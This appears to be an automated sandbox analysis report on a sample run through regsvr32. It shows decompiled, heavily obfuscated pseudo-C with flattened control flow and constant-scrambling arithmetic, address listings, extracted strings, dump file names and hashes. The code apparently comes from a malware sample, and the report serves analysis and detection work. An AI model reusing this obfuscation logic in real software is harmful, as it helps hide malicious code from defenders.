										}
										__eflags = _t1259 - 1;
										if(_t1259 != 1) {
											L64:
											_t1469 = 0x19b3c55;
											continue;
										}
										goto L79;
									}
									_t1469 = 0x856f9ca;
									continue;
								}
								_push(_t1384);
								_push(_t1384);
								_t1259 = E040ECCA0(_v324, _v480);
								_t1500 = _t1500 + 0x10;
								_t1466 = _t1259;
								_t1341 = 0xc4fb15d;
								goto L64;
							}
							__eflags = _t1469 - 0xb4f1747;
							if(_t1469 != 0xb4f1747) {
								break;
							}
							E040F0E63();
							_t1341 = 0x4f2172b;
							_push(_t1384);
							_push(_t1384);
							_t1259 = E040ECCA0(_v380, _v428);
							_t1500 = _t1500 + 0x10;
							_t1466 = _t1259;
							goto L29;
						}
						if(__eflags == 0) {
							_t1259 = E040EFBDE();
							_t1469 = 0xea72fdd;
							continue;
						}
						__eflags = _t1469 - 0x892c27a;
						if(_t1469 == 0x892c27a) {
							_t1259 = E040DA417(_t1384);
							goto L113;
						}
						__eflags = _t1469 - 0x8c2c3ca;
						if(_t1469 == 0x8c2c3ca) {
							_t1259 = E040EC5D5();
							_t1469 = 0x627e178;
							continue;
						}
						__eflags = _t1469 - 0x903542f;
						if(_t1469 == 0x903542f) {
							_t1259 = E040DD14C();
							_t1469 = 0x6362904;
							continue;
						}
						__eflags = _t1469 - 0x92191f9;
						if(_t1469 != 0x92191f9) {
							break;
						}
						_t1259 = E040ED111();
						__eflags = _t1259;
						if(_t1259 == 0) {
							_t1259 = E040DC6B8();
						}
						goto L64;
					}
					__eflags = _t1469 - 0x75265a3;
				} while (_t1469 != 0x75265a3);
				goto L113;
			}

0x040d863c
0x040d8642
0x040d864f
0x040d865a
0x040d8665
0x040d8670
0x040d867b
0x040d8683
0x040d868b
0x040d869c
0x040d86a0
0x040d86a5
0x040d86ad
0x040d86b8
0x040d86c3
0x040d86ce
0x040d86e2
0x040d86e7
0x040d86f0
0x040d86fb
0x040d8706
0x040d8711
0x040d8718
0x040d8723
0x040d872e
0x040d873d
0x040d8742
0x040d874b
0x040d8753
0x040d875e
0x040d8769
0x040d8774
0x040d877f
0x040d8792
0x040d8795
0x040d8798
0x040d879f
0x040d87aa
0x040d87b5
0x040d87bd
0x040d87c8
0x040d87d3
0x040d87e6
0x040d87f8
0x040d87ff
0x040d880a
0x040d8815
0x040d881d
0x040d8828
0x040d8833
0x040d8849
0x040d8850
0x040d885b
0x040d8866
0x040d8878
0x040d887b
0x040d8884
0x040d888f
0x040d889a
0x040d88ac
0x040d88af
0x040d88b0
0x040d88b7
0x040d88c2
0x040d88d7
0x040d88de
0x040d88e6
0x040d88f1
0x040d88fc
0x040d8907
0x040d890f
0x040d891a
0x040d8922
0x040d892a
0x040d893a
0x040d893e
0x040d8946
0x040d8951
0x040d8959
0x040d8964
0x040d896f
0x040d897a
0x040d8982
0x040d898a
0x040d8995
0x040d89a0
0x040d89a8
0x040d89b3
0x040d89be
0x040d89c9
0x040d89d4
0x040d89ea
0x040d89f9
0x040d89fc
0x040d8a03
0x040d8a0e
0x040d8a1b
0x040d8a1f
0x040d8a2c
0x040d8a30
0x040d8a38
0x040d8a43
0x040d8a4b
0x040d8a5a
0x040d8a5d
0x040d8a64
0x040d8a6f
0x040d8a7a
0x040d8a85
0x040d8a90
0x040d8a9b
0x040d8aa6
0x040d8ab1
0x040d8abc
0x040d8ad2
0x040d8ad7
0x040d8ae6
0x040d8aed
0x040d8af8
0x040d8b00
0x040d8b05
0x040d8b15
0x040d8b19
0x040d8b21
0x040d8b29
0x040d8b33
0x040d8b37
0x040d8b3c
0x040d8b44
0x040d8b4f
0x040d8b57
0x040d8b62
0x040d8b6d
0x040d8b78
0x040d8b83
0x040d8b8e
0x040d8b99
0x040d8ba4
0x040d8baf
0x040d8bba
0x040d8bc5
0x040d8bcd
0x040d8bd5
0x040d8bdd
0x040d8be5
0x040d8bed
0x040d8bf8
0x040d8c00
0x040d8c07
0x040d8c12
0x040d8c1d
0x040d8c25
0x040d8c30
0x040d8c3b
0x040d8c46
0x040d8c51
0x040d8c5c
0x040d8c6f
0x040d8c76
0x040d8c81
0x040d8c89
0x040d8c96
0x040d8c9a
0x040d8c9f
0x040d8ca7
0x040d8cb2
0x040d8cbd
0x040d8cc8
0x040d8cd3
0x040d8ce6
0x040d8ced
0x040d8cf8
0x040d8d03
0x040d8d0e
0x040d8d22
0x040d8d29
0x040d8d34
0x040d8d3f
0x040d8d47
0x040d8d4f
0x040d8d54
0x040d8d5c
0x040d8d64
0x040d8d71
0x040d8d79
0x040d8d84
0x040d8d8f
0x040d8d9a
0x040d8da5
0x040d8dad
0x040d8db8
0x040d8dc3
0x040d8dce
0x040d8dd6
0x040d8dde
0x040d8de9
0x040d8dff
0x040d8e08
0x040d8e13
0x040d8e1e
0x040d8e29
0x040d8e34
0x040d8e3f
0x040d8e4a
0x040d8e55
0x040d8e60
0x040d8e6b
0x040d8e76
0x040d8e81
0x040d8e8c
0x040d8e97
0x040d8ea2
0x040d8ead
0x040d8eb8
0x040d8ec3
0x040d8ece
0x040d8ed9
0x040d8ee4
0x040d8eef
0x040d8efa
0x040d8f05
0x040d8f0d
0x040d8f18
0x040d8f20
0x040d8f2b
0x040d8f37
0x040d8f3c
0x040d8f42
0x040d8f4b
0x040d8f50
0x040d8f56
0x040d8f5e
0x040d8f66
0x040d8f6b
0x040d8f73
0x040d8f78
0x040d8f80
0x040d8f92
0x040d8f95
0x040d8f9c
0x040d8fa7
0x040d8faf
0x040d8fb4
0x040d8fb8
0x040d8fc0
0x040d8fc8
0x040d8fd0
0x040d8fdb
0x040d8fee
0x040d8ff3
0x040d8ffa
0x040d9005
0x040d9010
0x040d901b
0x040d9026
0x040d9031
0x040d903c
0x040d9047
0x040d9052
0x040d905d
0x040d9068
0x040d9073
0x040d907e
0x040d9089
0x040d9094
0x040d909f
0x040d90aa
0x040d90b5
0x040d90c0
0x040d90c8
0x040d90d3
0x040d90db
0x040d90e0
0x040d90ef
0x040d90f2
0x040d90f6
0x040d90fe
0x040d9111
0x040d9118
0x040d9123
0x040d912e
0x040d9139
0x040d9144
0x040d915a
0x040d9161
0x040d916c
0x040d9182
0x040d9189
0x040d9191
0x040d919c
0x040d91a4
0x040d91ac
0x040d91b1
0x040d91b9
0x040d91c1
0x040d91cc
0x040d91d4
0x040d91dc
0x040d91e7
0x040d91ef
0x040d91f4
0x040d91f9
0x040d9201
0x040d9209
0x040d921b
0x040d921e
0x040d9225
0x040d9230
0x040d923b
0x040d9243
0x040d924b
0x040d9256
0x040d9261
0x040d926e
0x040d9276
0x040d9281
0x040d9289
0x040d9298
0x040d929b
0x040d92a4
0x040d92a8
0x040d92b0
0x040d92bb
0x040d92c6
0x040d92d1
0x040d92dc
0x040d92e7
0x040d92f2
0x040d92fd
0x040d930a
0x040d931b
0x040d931f
0x040d9327
0x040d9332
0x040d933a
0x040d9345
0x040d9350
0x040d935b
0x040d9366
0x040d936d
0x040d9378
0x040d938e
0x040d9395
0x040d93a0
0x040d93ab
0x040d93b3
0x040d93bb
0x040d93c3
0x040d93c8
0x040d93d0
0x040d93db
0x040d93e3
0x040d93ee
0x040d93f9
0x040d940c
0x040d940d
0x040d9414
0x040d941f
0x040d9427
0x040d942f
0x040d9437
0x040d943f
0x040d9447
0x040d944f
0x040d9454
0x040d9459
0x040d945e
0x040d9466
0x040d9471
0x040d947a
0x040d9481
0x040d948c
0x040d9497
0x040d94a2
0x040d94ad
0x040d94ba
0x040d94be
0x040d94cb
0x040d94d1
0x040d94d9
0x040d94e4
0x040d94ef
0x040d94fa
0x040d9505
0x040d950d
0x040d9518
0x040d9520
0x040d9525
0x040d9529
0x040d952e
0x040d9536
0x040d9541
0x040d954c
0x040d9557
0x040d9562
0x040d9577
0x040d957a
0x040d9581
0x040d958c
0x040d9599
0x040d959d
0x040d95aa
0x040d95ae
0x040d95b6
0x040d95c1
0x040d95c9
0x040d95d4
0x040d95df
0x040d95ea
0x040d95f5
0x040d9600
0x040d960b
0x040d9616
0x040d9621
0x040d962c
0x040d9637
0x040d9642
0x040d9658
0x040d965f
0x040d966a
0x040d9672
0x040d967e
0x040d9683
0x040d9689
0x040d9691
0x040d9699
0x040d96a4
0x040d96af
0x040d96c1
0x040d96c4
0x040d96cb
0x040d96d6
0x040d96e1
0x040d96ec
0x040d96f7
0x040d970a
0x040d9711
0x040d971c
0x040d9724
0x040d972c
0x040d9734
0x040d973c
0x040d9744
0x040d9751
0x040d975c
0x040d9767
0x040d976f
0x040d9774
0x040d9779
0x040d9781
0x040d9789
0x040d9794
0x040d979f
0x040d97aa
0x040d97c0
0x040d97c9
0x040d97d4
0x040d97df
0x040d97ea
0x040d97f2
0x040d97fd
0x040d9805
0x040d980a
0x040d980f
0x040d9817
0x040d981f
0x040d982a
0x040d9835
0x040d9840
0x040d984b
0x040d9856
0x040d9861
0x040d986c
0x040d9874
0x040d987c
0x040d9887
0x040d9892
0x040d989d
0x040d98a8
0x040d98b3
0x040d98be
0x040d98c9
0x040d98db
0x040d98e0
0x040d98e9
0x040d98f4
0x040d9907
0x040d990a
0x040d9919
0x040d9920
0x040d992b
0x040d9941
0x040d9948
0x040d9953
0x040d995f
0x040d9962
0x040d9966
0x040d996b
0x040d9973
0x040d997b
0x040d9986
0x040d998e
0x040d9996
0x040d99a1
0x040d99ac
0x040d99b7
0x040d99bf
0x040d99cc
0x040d99dc
0x040d99e7
0x040d99f2
0x040d99fd
0x040d9a05
0x040d9a10
0x040d9a24
0x040d9a29
0x040d9a30
0x040d9a37
0x040d9a42
0x040d9a4d
0x040d9a55
0x040d9a5d
0x040d9a65
0x040d9a6a
0x040d9a72
0x040d9a7d
0x040d9a88
0x040d9a93
0x040d9aa7
0x040d9aac
0x040d9ab3
0x040d9ac3
0x040d9aca
0x040d9aca
0x040d9ad5
0x040d9ad5
0x040d9ad5
0x040d9ad5
0x040d9adb
0x040d9adb
0x040d9ae1
0x040d9ae1
0x040da3f3
0x040da406
0x040da40d
0x040da40d
0x040d9ae7
0x040d9aed
0x040d9d2c
0x040d9d32
0x040d9e70
0x040d9e76
0x040d9f12
0x040d9f17
0x040d9ad5
0x040d9ad5
0x040d9ad5
0x040d9adb
0x040d9adb
0x00000000
0x040d9adb
0x00000000
0x040d9ad5
0x040d9e7c
0x040d9e82
0x040d9efc
0x040d9f01
0x00000000
0x040d9f01
0x040d9e84
0x040d9e8a
0x040d9ed0
0x040d9edc
0x040d9ee5
0x040d9eed
0x00000000
0x040d9eed
0x040d9e8c
0x040d9e92
0x00000000
0x00000000
0x040d9ea6
0x040d9eaf
0x040d9eb7
0x00000000
0x040d9eb7
0x040d9d38
0x040d9e5a
0x040d9e63
0x040d9e65
0x040d9c17
0x040d9c17
0x00000000
0x040d9c17
0x040d9d3e
0x040d9d44
0x040d9e3c
0x040d9e41
0x040d9e43
0x00000000
0x00000000
0x040d9e49
0x00000000
0x040d9e49
0x040d9d4a
0x040d9d50
0x040d9e0f
0x040d9e14
0x040d9e1b
0x040d9e23
0x00000000
0x040d9e23
0x040d9d52
0x040d9d58
0x040d9db7
0x040d9dbe
0x040d9dc3
0x00000000
0x040d9dc3
0x040d9d5a
0x040d9d60
0x00000000
0x00000000
0x040d9d82
0x040d9d9e
0x040d9da3
0x040d9da6
0x040d9dad
0x00000000
0x040d9dad
0x040d9af3
0x040d9d15
0x040d9d1a
0x040d9d1c
0x00000000
0x00000000
0x040d9d22
0x00000000
0x040d9d22
0x040d9af9
0x040d9aff
0x040d9c82
0x040d9c88
0x040da3dc
0x00000000
0x040da3e2
0x040d9c8e
0x040d9c94
0x040d9cf8
0x040d9cfd
0x00000000
0x040d9cfd
0x040d9c96
0x040d9c9c
0x040d9cdb
0x040d9ce0
0x040d9ce7
0x00000000
0x040d9ce7
0x040d9c9e
0x040d9ca4
0x00000000
0x00000000
0x040d9cc3
0x040d9cca
0x040d9cca
0x00000000
0x040d9cca
0x040d9b05
0x040d9c63
0x040d9c68
0x040d9c6f
0x040d9c77
0x00000000
0x040d9c77
0x040d9b11
0x040d9bf6
0x040d9bfb
0x040d9bfd
0x040d9c26
0x040d9c2f
0x040d9c37
0x00000000
0x040d9c37
0x040d9c06
0x040d9c0f
0x040d9c11
0x040d9c11
0x00000000
0x040d9c11
0x040d9b1d
0x040d9bd1
0x040d9bd6
0x040d9bd8
0x00000000
0x00000000
0x040d9bde
0x00000000
0x040d9bde
0x040d9b29
0x040d9b61
0x040d9b68
0x040d9bbc
0x040d9bbc
0x00000000
0x040d9bbc
0x040d9b95
0x040d9b9a
0x040d9b9d
0x040d9ba4
0x040d9bb7
0x00000000
0x040d9ba6
0x040d9ba6
0x00000000
0x040d9ba6
0x040d9ba4
0x040d9b31
0x00000000
0x040d9b37
0x040d9b50
0x040d9b57
0x00000000
0x040d9b57
0x040d9f21
0x040d9f21
0x040d9f27
0x040da137
0x040da13d
0x040da284
0x040da28a
0x040da3af
0x040da3b4
0x00000000
0x040da3b4
0x040da290
0x040da296
0x040da399
0x040da39e
0x00000000
0x040da39e
0x040da29c
0x040da2a2
0x040da2db
0x040da2fd
0x040da319
0x040da325
0x040da33b
0x040da356
0x040da381
0x040da386
0x040da386
0x00000000
0x040da2a2
0x040da143
0x040da27a
0x00000000
0x040da27a
0x040da149
0x040da14f
0x040da1dd
0x040da1e2
0x040da1e7
0x040da1ea
0x040da1ec
0x040da1f4
0x040da1fb
0x040da1fd
0x040da218
0x040da219
0x040da22a
0x040da22c
0x040da22f
0x040da22f
0x040da236
0x040da239
0x040da254
0x040da255
0x040da264
0x040da269
0x040da26c
0x040da26c
0x040da1ee
0x040da1ee
0x040da1ee
0x040da26e
0x040da270
0x00000000
0x040da270
0x040da151
0x040da153
0x040da1b4
0x040da1b9
0x040da1ba
0x00000000
0x040da1ba
0x040da155
0x040da15b
0x040da18c
0x040da191
0x040da198
0x00000000
0x040da198
0x040da15d
0x040da163
0x00000000
0x00000000
0x040da169
0x040da170
0x040da172
0x00000000
0x040da172
0x040d9f2d
0x040da121
0x040da126
0x040da12d
0x00000000
0x040da12d
0x040d9f33
0x040d9f39
0x040d9fd2
0x040d9fd8
0x040da106
0x040da10b
0x040da10d
0x00000000
0x00000000
0x040da113
0x00000000
0x040da113
0x040d9fde
0x040d9fe4
0x040da0e4
0x040da0e9
0x040da0eb
0x00000000
0x00000000
0x040da0f1
0x00000000
0x040da0f1
0x040d9fea
0x040d9ff0
0x040da066
0x040da06d
0x040da072
0x040da075
0x040da077
0x040da0b0
0x040da0b7
0x040da0ba
0x040da0c6
0x040da0c8
0x040da0d3
0x040da0d3
0x00000000
0x040da0d3
0x040da0ca
0x040da0cd
0x040d9f85
0x040d9f85
0x00000000
0x040d9f85
0x00000000
0x040da0cd
0x040da0bc
0x00000000
0x040da0bc
0x040da08f
0x040da090
0x040da09f
0x040da0a4
0x040da0a7
0x040da0a9
0x00000000
0x040da0a9
0x040d9ff2
0x040d9ff8
0x00000000
0x00000000
0x040da00c
0x040da015
0x040da029
0x040da02a
0x040da039
0x040da03e
0x040da041
0x00000000
0x040da041
0x040d9f3f
0x040d9fc3
0x040d9fc8
0x00000000
0x040d9fc8
0x040d9f41
0x040d9f47
0x040da401
0x00000000
0x040da401
0x040d9f4d
0x040d9f53
0x040d9fb0
0x040d9fb5
0x00000000
0x040d9fb5
0x040d9f55
0x040d9f5b
0x040d9f9a
0x040d9f9f
0x00000000
0x040d9f9f
0x040d9f5d
0x040d9f63
0x00000000
0x00000000
0x040d9f70
0x040d9f75
0x040d9f77
0x040d9f80
0x040d9f80
0x00000000
0x040d9f77
0x040da3b9
0x040da3b9
0x00000000

Strings

Jvmw, xrefs: 040D8BDD
"{6, xrefs: 040D9471
L}, xrefs: 040D9139
Reo, xrefs: 040D92FD
3}, xrefs: 040D9789
jmI, xrefs: 040D8FAF
_1, xrefs: 040D9781
;w, xrefs: 040D8B19
Uj`, xrefs: 040D94FA
XG, xrefs: 040D8FFA
s2O, xrefs: 040D9953
BO6, xrefs: 040D99BF
S, xrefs: 040DA185
|V, xrefs: 040D8D29
t0+, xrefs: 040D879F
Q2N, xrefs: 040D8DC3
F, xrefs: 040D90E0
C", xrefs: 040D8CBD
t, xrefs: 040D93E3
Tvs, xrefs: 040D8C30
AW, xrefs: 040D9A55
08s%, xrefs: 040D865A
Kx!, xrefs: 040D997B
/1, xrefs: 040D93BB
+>, xrefs: 040D9861
W?n, xrefs: 040D8BF8
E, xrefs: 040D8CF8
.MZ, xrefs: 040D96D6
C", xrefs: 040D878A
C, xrefs: 040D9734
LNe, xrefs: 040D91B9

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: C$"{6$+>$.MZ$/1$08s%$3}$;w$AW$BO6$C"$C"$Jvmw$Kx!$LNe$Q2N$Reo$S$Tvs$Uj`$W?n$XG$_1$jmI$s2O$t0+$t$|V$E$F$L}
API String ID: 0-3734606162
Opcode ID: 09f24c8bc5d755dd7195b1c30a9aebb1c0743679cb0a1a831ce3b66363bb6cf4
Instruction ID: 85b7453f7db3b3215d6aa8180c57d9d6c7818c6ae9652a644b78b69eaec615a3
Opcode Fuzzy Hash: 09f24c8bc5d755dd7195b1c30a9aebb1c0743679cb0a1a831ce3b66363bb6cf4
Instruction Fuzzy Hash: 99E201B19083818BD3B8CF25C589ADFBBE1BBC5318F10891DE5D996260DBB19949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 040DA871, Relevance: 24.4, Strings: 19, Instructions: 646
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E040DA871(void* __ecx) {
				char _v524;
				char _v1044;
				char _v1564;
				char _v2084;
				char _v2604;
				signed int _v2608;
				signed int _v2612;
				intOrPtr _v2616;
				intOrPtr _v2620;
				intOrPtr _v2624;
				char _v2628;
				intOrPtr _v2632;
				char _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				unsigned int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _v2776;
				signed int _v2780;
				signed int _v2784;
				signed int _v2788;
				signed int _v2792;
				signed int _v2796;
				signed int _v2800;
				signed int _v2804;
				signed int _v2808;
				signed int _v2812;
				signed int _v2816;
				signed int _v2820;
				signed int _v2824;
				signed int _v2828;
				signed int _v2832;
				signed int _v2836;
				signed int _v2840;
				signed int _v2844;
				signed int _v2848;
				signed int _v2852;
				signed int _v2856;
				signed int _v2860;
				signed int _v2864;
				signed int _v2868;
				signed int _v2872;
				signed int _v2876;
				signed int _v2880;
				signed int _v2884;
				signed int _v2888;
				signed int _v2892;
				signed int _v2896;
				signed int _v2900;
				signed int _v2904;
				signed int _v2908;
				signed int _v2912;
				signed int _v2916;
				signed int _v2920;
				signed int _v2924;
				signed int _v2928;
				signed int _v2932;
				void* _t731;
				signed int _t732;
				signed int _t733;
				signed int _t743;
				signed int _t758;
				void* _t761;
				signed int _t763;
				signed int _t764;
				signed int _t765;
				signed int _t766;
				signed int _t767;
				signed int _t768;
				signed int _t769;
				signed int _t770;
				signed int _t771;
				signed int _t772;
				signed int _t773;
				signed int _t774;
				signed int _t775;
				signed int _t776;
				signed int _t777;
				signed int _t778;
				signed int _t779;
				signed int _t780;
				signed int _t783;
				void* _t804;
				void* _t861;
				signed int _t865;
				void* _t867;
				signed int* _t868;
				void* _t874;

				_t868 =  &_v2932;
				_v2612 = _v2612 & 0x00000000;
				_v2608 = _v2608 & 0x00000000;
				_v2616 = 0x74b642;
				_v2776 = 0xf885ca;
				_v2776 = _v2776 | 0xffdfd4be;
				_v2776 = _v2776 ^ 0xffffd5d7;
				_v2704 = 0xd88538;
				_v2704 = _v2704 + 0xebcf;
				_v2704 = _v2704 ^ 0x00c97107;
				_v2800 = 0xd52646;
				_v2800 = _v2800 ^ 0xe8dc52fe;
				_v2800 = _v2800 + 0xffffe935;
				_v2800 = _v2800 ^ 0xe804d8f6;
				_v2688 = 0xbafe67;
				_v2688 = _v2688 + 0x9481;
				_v2688 = _v2688 ^ 0x00b13019;
				_v2884 = 0x3d12e1;
				_v2884 = _v2884 << 1;
				_v2884 = _v2884 * 0x55;
				_t867 = __ecx;
				_t861 = 0xbf2cce3;
				_t763 = 0x73;
				_v2884 = _v2884 * 0xf;
				_v2884 = _v2884 ^ 0x605e8f7b;
				_v2696 = 0xf649d9;
				_v2696 = _v2696 / _t763;
				_v2696 = _v2696 ^ 0x000dd9df;
				_v2764 = 0x4a6242;
				_v2764 = _v2764 + 0xffff45cb;
				_v2764 = _v2764 >> 0xc;
				_v2764 = _v2764 ^ 0x000572e2;
				_v2784 = 0x8333a2;
				_t764 = 0x2e;
				_v2784 = _v2784 / _t764;
				_v2784 = _v2784 + 0xffffe135;
				_v2784 = _v2784 ^ 0x0005b928;
				_v2852 = 0xf9a739;
				_v2852 = _v2852 | 0x42d1f5c6;
				_v2852 = _v2852 + 0xfffff01c;
				_v2852 = _v2852 ^ 0x42f87d02;
				_v2896 = 0x31e192;
				_v2896 = _v2896 << 0xa;
				_v2896 = _v2896 << 0xa;
				_t765 = 0xb;
				_v2896 = _v2896 * 0x26;
				_v2896 = _v2896 ^ 0xbac011ee;
				_v2928 = 0xcde58e;
				_v2928 = _v2928 | 0x2bdbfaea;
				_v2928 = _v2928 << 8;
				_v2928 = _v2928 | 0x4ddc4764;
				_v2928 = _v2928 ^ 0xdffb1335;
				_v2740 = 0xd63953;
				_v2740 = _v2740 + 0x5c5c;
				_v2740 = _v2740 ^ 0x00d7db1f;
				_v2844 = 0x6db889;
				_v2844 = _v2844 + 0x1eed;
				_v2844 = _v2844 / _t765;
				_v2844 = _v2844 ^ 0x0002c3cf;
				_v2796 = 0x98820d;
				_v2796 = _v2796 | 0x8cff8acf;
				_t766 = 0x43;
				_v2796 = _v2796 / _t766;
				_v2796 = _v2796 ^ 0x021946ce;
				_v2668 = 0x18627d;
				_t767 = 7;
				_v2668 = _v2668 / _t767;
				_v2668 = _v2668 ^ 0x00044156;
				_v2772 = 0x2c7378;
				_v2772 = _v2772 >> 0xb;
				_v2772 = _v2772 >> 6;
				_v2772 = _v2772 ^ 0x000b6d9a;
				_v2880 = 0xd4c7fd;
				_t768 = 0x7b;
				_v2880 = _v2880 / _t768;
				_v2880 = _v2880 + 0xffffaacc;
				_t769 = 0x22;
				_v2880 = _v2880 * 0x2f;
				_v2880 = _v2880 ^ 0x00480dcd;
				_v2920 = 0xe4d6f8;
				_v2920 = _v2920 * 0x42;
				_v2920 = _v2920 + 0xa0b6;
				_v2920 = _v2920 << 8;
				_v2920 = _v2920 ^ 0x000574ec;
				_v2640 = 0xd6ae6b;
				_v2640 = _v2640 | 0xbe6f316b;
				_v2640 = _v2640 ^ 0xbefadf9c;
				_v2836 = 0x6fb4;
				_v2836 = _v2836 + 0xffffc368;
				_v2836 = _v2836 >> 0x10;
				_v2836 = _v2836 ^ 0x0009680a;
				_v2724 = 0x8b61bc;
				_v2724 = _v2724 * 0x75;
				_v2724 = _v2724 ^ 0x3fbdc7d4;
				_v2912 = 0x753704;
				_v2912 = _v2912 >> 0xb;
				_v2912 = _v2912 + 0xd457;
				_v2912 = _v2912 << 1;
				_v2912 = _v2912 ^ 0x000d652f;
				_v2716 = 0xde59a0;
				_v2716 = _v2716 + 0xffff5778;
				_v2716 = _v2716 ^ 0x00d8a7a4;
				_v2752 = 0x428dcf;
				_v2752 = _v2752 / _t769;
				_v2752 = _v2752 | 0x08d5d60c;
				_v2752 = _v2752 ^ 0x08d7d48c;
				_v2828 = 0xe83a42;
				_v2828 = _v2828 ^ 0x1f3eb5e2;
				_v2828 = _v2828 * 0x7e;
				_v2828 = _v2828 ^ 0xab9e63e1;
				_v2788 = 0x69d445;
				_v2788 = _v2788 | 0x87a4a8ed;
				_v2788 = _v2788 ^ 0x9a4d3e24;
				_v2788 = _v2788 ^ 0x1da0be74;
				_v2888 = 0x7663d0;
				_v2888 = _v2888 | 0x8f53a1f3;
				_v2888 = _v2888 >> 0xf;
				_v2888 = _v2888 * 0xa;
				_v2888 = _v2888 ^ 0x000d5ba1;
				_v2644 = 0x20e74e;
				_v2644 = _v2644 | 0x742f98e9;
				_v2644 = _v2644 ^ 0x74210d1b;
				_v2904 = 0xfccdb4;
				_t770 = 0xd;
				_v2904 = _v2904 * 0x7c;
				_v2904 = _v2904 >> 0xd;
				_v2904 = _v2904 | 0x17cf49de;
				_v2904 = _v2904 ^ 0x17c7aae5;
				_v2708 = 0xc1d2f2;
				_v2708 = _v2708 + 0xffff5a94;
				_v2708 = _v2708 ^ 0x00cb5d75;
				_v2660 = 0x58d6fe;
				_v2660 = _v2660 + 0x639e;
				_v2660 = _v2660 ^ 0x00518056;
				_v2652 = 0x6bd84b;
				_v2652 = _v2652 + 0xb95a;
				_v2652 = _v2652 ^ 0x00624667;
				_v2700 = 0xf92c4f;
				_v2700 = _v2700 * 0x75;
				_v2700 = _v2700 ^ 0x71e1c3ce;
				_v2892 = 0xd4714c;
				_v2892 = _v2892 + 0xffffadfa;
				_v2892 = _v2892 + 0xd7d2;
				_v2892 = _v2892 << 2;
				_v2892 = _v2892 ^ 0x0358083c;
				_v2900 = 0xca6485;
				_v2900 = _v2900 ^ 0x66674751;
				_v2900 = _v2900 | 0x9fb8fe7f;
				_v2900 = _v2900 ^ 0xffb729be;
				_v2824 = 0x9c46e2;
				_v2824 = _v2824 / _t770;
				_t771 = 0x6e;
				_v2824 = _v2824 * 7;
				_v2824 = _v2824 ^ 0x005409ff;
				_v2832 = 0x773d17;
				_v2832 = _v2832 >> 0xe;
				_v2832 = _v2832 + 0x6313;
				_v2832 = _v2832 ^ 0x000d17fa;
				_v2792 = 0x3014cc;
				_v2792 = _v2792 + 0xffff152c;
				_v2792 = _v2792 + 0xffff3bdf;
				_v2792 = _v2792 ^ 0x002eea21;
				_v2864 = 0x76e575;
				_v2864 = _v2864 | 0xb1b1a986;
				_v2864 = _v2864 * 0x79;
				_v2864 = _v2864 ^ 0x1e28dcc7;
				_v2712 = 0xf7e6ad;
				_v2712 = _v2712 * 0xb;
				_v2712 = _v2712 ^ 0x0aae7ee0;
				_v2808 = 0xd4cb39;
				_v2808 = _v2808 * 0x50;
				_v2808 = _v2808 * 0x75;
				_v2808 = _v2808 ^ 0x6440f87f;
				_v2720 = 0x360163;
				_v2720 = _v2720 + 0xffffc3fc;
				_v2720 = _v2720 ^ 0x0035ed30;
				_v2816 = 0xf63972;
				_v2816 = _v2816 / _t771;
				_v2816 = _v2816 + 0xffff69c4;
				_v2816 = _v2816 ^ 0x0001f3af;
				_v2728 = 0x218a6d;
				_v2728 = _v2728 | 0x0e9fd07f;
				_v2728 = _v2728 ^ 0x0eb1edc0;
				_v2756 = 0x58a84f;
				_v2756 = _v2756 * 0x22;
				_t772 = 0x3d;
				_v2756 = _v2756 / _t772;
				_v2756 = _v2756 ^ 0x0033367e;
				_v2680 = 0x526d89;
				_v2680 = _v2680 << 3;
				_v2680 = _v2680 ^ 0x02908fe9;
				_v2876 = 0xb95aa0;
				_t773 = 0x6f;
				_v2876 = _v2876 / _t773;
				_v2876 = _v2876 + 0x7ba5;
				_v2876 = _v2876 | 0x4bff3dbe;
				_v2876 = _v2876 ^ 0x4bf5695e;
				_v2748 = 0x470f02;
				_t774 = 0x6a;
				_v2748 = _v2748 / _t774;
				_v2748 = _v2748 ^ 0x394a4d48;
				_v2748 = _v2748 ^ 0x39498008;
				_v2684 = 0xb8f542;
				_v2684 = _v2684 * 0x66;
				_v2684 = _v2684 ^ 0x49b10479;
				_v2812 = 0x4a6932;
				_v2812 = _v2812 >> 7;
				_v2812 = _v2812 ^ 0xe4afcb01;
				_v2812 = _v2812 ^ 0xe4ae05c3;
				_v2932 = 0xa851a7;
				_v2932 = _v2932 * 0x2b;
				_v2932 = _v2932 ^ 0x9481cb07;
				_v2932 = _v2932 >> 6;
				_v2932 = _v2932 ^ 0x02246e93;
				_v2872 = 0x6bc7af;
				_v2872 = _v2872 ^ 0x3226b467;
				_v2872 = _v2872 * 0x1e;
				_v2872 = _v2872 << 0xb;
				_v2872 = _v2872 ^ 0x9c8deb19;
				_v2860 = 0x8556fb;
				_v2860 = _v2860 | 0x69e02514;
				_v2860 = _v2860 + 0xedcb;
				_v2860 = _v2860 ^ 0x69e8258b;
				_v2676 = 0xb187db;
				_v2676 = _v2676 << 0xb;
				_v2676 = _v2676 ^ 0x8c3acae2;
				_v2656 = 0xd34daf;
				_v2656 = _v2656 >> 0xe;
				_v2656 = _v2656 ^ 0x0009be95;
				_v2804 = 0x3574a6;
				_v2804 = _v2804 >> 9;
				_v2804 = _v2804 * 0x2a;
				_v2804 = _v2804 ^ 0x00009063;
				_v2760 = 0x8f0143;
				_v2760 = _v2760 * 0x43;
				_v2760 = _v2760 >> 3;
				_v2760 = _v2760 ^ 0x04abe301;
				_v2924 = 0x8fc82d;
				_v2924 = _v2924 << 1;
				_v2924 = _v2924 | 0xafdefbbe;
